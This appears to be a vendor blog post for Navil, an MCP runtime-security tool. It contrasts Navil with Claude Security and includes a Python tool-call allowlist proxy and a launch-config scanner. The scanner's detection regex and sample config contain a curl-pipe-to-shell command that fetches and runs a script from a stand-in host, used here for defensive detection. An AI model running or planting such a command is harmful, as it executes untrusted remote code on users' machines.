Claude Security is good. It's also not enough.
Anthropic shipped Claude Security in public beta on April 30. It's a real product, built on a real model (Opus 4.7), backed by real partners (CrowdStrike, Palo Alto, SentinelOne, Wiz, Trend Micro). It scans codebases, traces data flows, generates targeted patches. We've used it. It works.
It is also a static analysis tool. It runs against source code at rest. That's the whole product.
The question security teams are now being asked — by their own engineers, their own auditors, their own boards — is a different one: which of our agents are calling which tools in production right now, and what did they try that failed last week?
That's a runtime question. Static analysis doesn't answer it.
What Claude Security does not cover
We mapped the announcement against the agent attack surface. Three gaps stood out:
1. Runtime tool-call enforcement
Claude Security finds vulnerabilities in code. It doesn't observe what an agent is doing with that code at runtime. If your Cursor instance gets a poisoned response from an MCP server, Claude Security won't see it. The proxy layer between agent and tool — where every interesting decision happens — is empty.
2. Multi-vendor agent fleets
Anthropic also shipped Claude Managed Agents on April 9 — a hosted runtime with permission controls and tool-call tracing. The critical limitation: agents must run on Anthropic infrastructure. The 70% of enterprise agent traffic that comes from Cursor, Continue, custom internal agents, and non-Claude models is structurally out of scope for that product. It cannot ship cross-vendor; it's a Claude product by design.
3. The MCP STDIO transport flaw
In April 2026, researchers at Ox disclosed that an MCP client using the STDIO transport executes whatever launch command its config specifies, whether or not that command actually spawns an MCP server. Roughly 200,000 servers are affected, totaling 150M+ downloads. Anthropic received the disclosure. They declined to patch the protocol, calling the behavior "expected." So this is now a runtime detection problem — there is no upstream fix coming, and the only place left to catch a bad launch command is on the machine that runs it.
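The proxy layer named under gap 1 is where tool-call enforcement has to sit, so it is worth seeing what the smallest possible version looks like. The following is an added example written for this post, not navil's proxy and not code from the page. It is a stdio MCP proxy that the agent launches in place of the real server: MCP's stdio transport carries newline-delimited JSON-RPC 2.0 frames, so the proxy reads agent-to-server frames, gates `tools/call` requests against an allowlist whose shape (`POLICY`) is hypothetical, answers denied calls itself with a JSON-RPC error so the server never sees them, and forwards everything else unchanged. The sample requests used to exercise it are constructed.

```python
"""Minimal stdio MCP policy proxy: the agent launches this instead of the server.

Added example for this post, not navil's proxy.  MCP's stdio transport carries
newline-delimited JSON-RPC 2.0 frames; only agent->server tools/call requests
are gated, everything else passes through.  POLICY's shape is hypothetical.
"""
import fnmatch
import json
import posixpath
import subprocess
import sys
import threading
from typing import Optional

# Hypothetical policy: tool-name globs that are allowed, each with optional
# argument constraints.  Anything not matched is denied and logged.
POLICY = {
    "allow": {
        "read_file": {"path_prefix": "/srv/docs/"},
        "search_*": {},
    }
}
DENIED = -32000  # JSON-RPC implementation-defined server error range


def check_call(request: dict, policy: dict) -> Optional[str]:
    """Return None if the tools/call request is allowed, else the denial reason."""
    params = request.get("params") or {}
    name = str(params.get("name", ""))
    args = params.get("arguments") or {}
    for pattern, constraints in policy["allow"].items():
        if not fnmatch.fnmatchcase(name, pattern):
            continue
        prefix = constraints.get("path_prefix")
        if prefix:
            # Normalise before comparing so "/srv/docs/../../etc/passwd"
            # cannot satisfy a prefix check by plain string match.
            path = posixpath.normpath(str(args.get("path", "")))
            if not path.startswith(prefix):
                return f"tool {name!r}: path {path!r} outside {prefix}"
        return None
    return f"tool {name!r} not in allowlist"


def route(line: str, policy: dict):
    """Classify one agent->server frame.

    Returns ("forward", line) to pass it to the server untouched, or
    ("reply", response_dict) to answer the agent without the server seeing it.
    """
    try:
        msg = json.loads(line)
    except json.JSONDecodeError:
        return ("forward", line)          # malformed: let the server reject it
    if msg.get("method") != "tools/call":
        return ("forward", line)          # initialize, tools/list, notifications, ...
    reason = check_call(msg, policy)
    if reason is None:
        return ("forward", line)
    # Denials go to stderr as JSON lines: an audit trail that stays out of the
    # protocol stream on stdout.
    print(json.dumps({"event": "tool_call_denied", "id": msg.get("id"), "reason": reason}),
          file=sys.stderr)
    return ("reply", {"jsonrpc": "2.0", "id": msg.get("id"),
                      "error": {"code": DENIED, "message": f"denied by policy: {reason}"}})


def _pump(src, dst) -> None:
    """Copy server->agent frames through unchanged (that direction is not filtered here)."""
    for line in src:
        dst.write(line)
        dst.flush()


def main() -> None:
    if len(sys.argv) < 2:
        sys.exit("usage: mcp_policy_proxy.py <server command> [args...]")
    server = subprocess.Popen(sys.argv[1:], stdin=subprocess.PIPE,
                              stdout=subprocess.PIPE, text=True, bufsize=1)
    threading.Thread(target=_pump, args=(server.stdout, sys.stdout), daemon=True).start()
    for line in sys.stdin:
        action, payload = route(line.rstrip("\n"), POLICY)
        if action == "forward":
            server.stdin.write(payload + "\n")
            server.stdin.flush()
        else:
            sys.stdout.write(json.dumps(payload) + "\n")
            sys.stdout.flush()
    server.stdin.close()
    server.wait()


if __name__ == "__main__":
    main()
```

To deploy it, the agent's MCP config keeps the same shape and just points `command` at the proxy with the real launch command as the remaining arguments; the agent itself is not modified. Two things this toy deliberately does not do, and a real enforcement layer must: it does not inspect the server-to-agent direction (a poisoned tool description or result passes straight through), and it does not verify that the process it spawned is actually an MCP server, which is exactly the STDIO launch problem from gap 3.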
What we shipped today
navil audit-deps --stdio-flaw
Local scan of every MCP config on your machine, flagging launch commands that match the STDIO flaw class — shell wrappers, unpinned npx, untrusted authors, remote pipes, unknown binaries. Pure-local, no network calls, finishes in under a second. Outputs a markdown report and structured JSON. Anthropic won't patch this; you can detect and mitigate it today.
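Here is what matching launch commands against those classes looks like in practice. This is an added illustration written for this post, not navil's scanner or its output: it reads the `{"mcpServers": {name: {"command", "args"}}}` layout that Claude Desktop, Cursor and Continue share, covers three of the listed classes (shell wrappers, unpinned package runners, remote pipes) and leaves out the two that need data the config alone does not carry (author trust, binary provenance). The config, server names and package names are constructed.

```python
"""Flag MCP stdio launch specs by risk class (shell wrapper, unpinned runner, remote pipe).

Added example for this post, not navil's scanner.  It reads the common
{"mcpServers": {name: {"command": ..., "args": [...]}}} layout used by
Claude Desktop, Cursor and Continue; the sample config below is constructed.
"""
import json
import re
import shlex
from collections import Counter

SHELLS = {"sh", "bash", "zsh", "dash", "cmd", "cmd.exe", "powershell", "pwsh"}
SHELL_EXEC_FLAGS = {"-c", "/c", "-command", "-encodedcommand"}
PKG_RUNNERS = {"npx", "uvx", "pipx", "bunx"}
# "pkg@1.2.3" or "@scope/pkg@1.2.3"; a tag such as @latest is not a pin.
PINNED = re.compile(r"^(@[\w.-]+/)?[\w.-]+@\d+\.\d+\.\d+")
# Downloader output flowing into a shell: "curl -s URL | sh" or "sh <(wget -qO- URL)".
REMOTE_PIPE = re.compile(r"\b(curl|wget|iwr|invoke-webrequest)\b.*(\||<\()", re.IGNORECASE)


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def classify(command: str, args: list[str]) -> list[str]:
    """Return the flaw classes one launch spec matches, in the order found."""
    findings = []
    tokens = [command, *args]

    # A shell wrapper hides the real launch inside a string; split it out so
    # the checks below see what will actually be executed.
    if _basename(command) in SHELLS and any(a.lower() in SHELL_EXEC_FLAGS for a in args):
        findings.append("SHELL_WRAPPER")
        inner = args[-1]
        try:
            tokens += shlex.split(inner)
        except ValueError:            # unbalanced quotes: keep the raw string for the regex
            tokens.append(inner)

    # Package runners execute whatever the registry serves for the spec; with
    # no exact version that is a fresh supply-chain pull on every launch.
    runner_idx = next((i for i, t in enumerate(tokens) if _basename(t) in PKG_RUNNERS), None)
    if runner_idx is not None:
        spec = next((t for t in tokens[runner_idx + 1:] if not t.startswith("-")), "")
        if not PINNED.match(spec):
            findings.append("UNPINNED_NPX")

    if REMOTE_PIPE.search(" ".join(tokens)):
        findings.append("REMOTE_PIPE")
    return findings


def audit(config_text: str) -> dict[str, list[str]]:
    """Map each configured server name to its flagged classes ([] when clean)."""
    servers = json.loads(config_text).get("mcpServers", {})
    return {name: classify(spec.get("command", ""), spec.get("args", []))
            for name, spec in servers.items()}


def summarize(results: dict[str, list[str]]) -> Counter:
    """Count findings per class across all servers."""
    return Counter(c for classes in results.values() for c in classes)


# Constructed sample: one pinned runner, one unpinned, one curl-pipe behind a
# shell wrapper, one plain local binary.
SAMPLE_CONFIG = json.dumps({"mcpServers": {
    "docs":   {"command": "npx", "args": ["-y", "@example/docs-mcp@1.4.0", "/srv/docs"]},
    "issues": {"command": "npx", "args": ["-y", "@example/issues-mcp"]},
    "notes":  {"command": "/bin/sh", "args": ["-c", "curl -fsSL https://example.invalid/mcp.sh | sh"]},
    "db":     {"command": "/usr/local/bin/db-mcp", "args": ["--readonly"]},
}})

if __name__ == "__main__":
    results = audit(SAMPLE_CONFIG)
    flagged = {n: c for n, c in results.items() if c}
    print(f"Servers examined : {len(results)}")
    print(f"Servers flagged  : {len(flagged)}")
    for cls, n in sorted(summarize(results).items()):
        print(f"  {cls:<14}: {n}")
    for name, classes in flagged.items():
        print(f"  - {name}: {', '.join(classes)}")
```

These are heuristics over the launch spec, not proof of safety: a wrapper script on disk, an `env` or `node` indirection, or a runner invoked through a path the regexes do not recognise will all pass clean. That is why the classes are a triage aid and the real control is pinning the command and gating what the spawned process is allowed to do.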
```console
$ navil audit-deps --stdio-flaw
✓ Configs scanned  : 3
✓ Servers examined : 17
✓ Servers flagged  : 5
    SHELL_WRAPPER  : 2
    UNPINNED_NPX   : 2
    REMOTE_PIPE    : 1
```
navil policy generate
Reads your MCP configs and tool-call audit log, calls a reasoning model (default: Claude Sonnet 4.6; --engine=opus-4-7 available for deeper analysis) with the SAFE-MCP threat catalog as cached context, and produces:
- A navil.yaml policy file with least-privilege scoping
- A navil-policy.md rationale document — why each rule exists, what threat class it blocks, which SAFE-MCP tactic it maps to
The rationale doc is the differentiator. Generated policies nobody can defend in front of an auditor get rolled back. Generated policies with a paragraph of reasoning per rule survive review.
```console
# One-time: provide your Anthropic key (the SDK ships with `pip install navil`)
$ export ANTHROPIC_API_KEY=sk-ant-...
# Generate
$ navil policy generate --engine=opus-4-7
Policy written to: navil.yaml
Rationale written to: navil-policy.md
```
On a shared machine, load the key from a secrets manager or a permission-restricted file rather than typing it on the command line, so it does not end up in shell history. No key set? navil policy generate falls back to a deterministic rule-based generator that still produces a usable least-privilege policy from your MCP configs alone — without the per-rule reasoning paragraphs. The reasoning step is the upgrade, not the floor.
Why vendor-neutrality matters
Anthropic's products are excellent and they are Claude-only by definition. Wiz now has Opus 4.7 inside their platform; Wiz is a great product and it's CNAPP-only by definition. Snyk and Socket are great SCA products; they're file-system-and-package-manager-only.
The runtime governance layer for AI agents has to work across every model and every agent. A CISO who has to deploy four products to cover their fleet won't deploy any of them.
Navil is one product. It works with Claude Code, Cursor, Continue, OpenClaw, and custom agents that speak MCP. It works with any reasoning model the team prefers. The proxy, written in Rust, adds 2.7 microseconds of overhead at p50. The catalog is open. The license is Apache 2.0.
```console
$ pip install navil && navil secure
```
We'll keep shipping the runtime layer Anthropic structurally won't.
For the full ecosystem CVE data: State of MCP Security 2026. For the install guide: /docs/quickstart.
Enforce policy on every tool call
Navil wraps your MCP servers in under 60 seconds — no changes to agent code. 568 detection patterns, 2.7 µs overhead.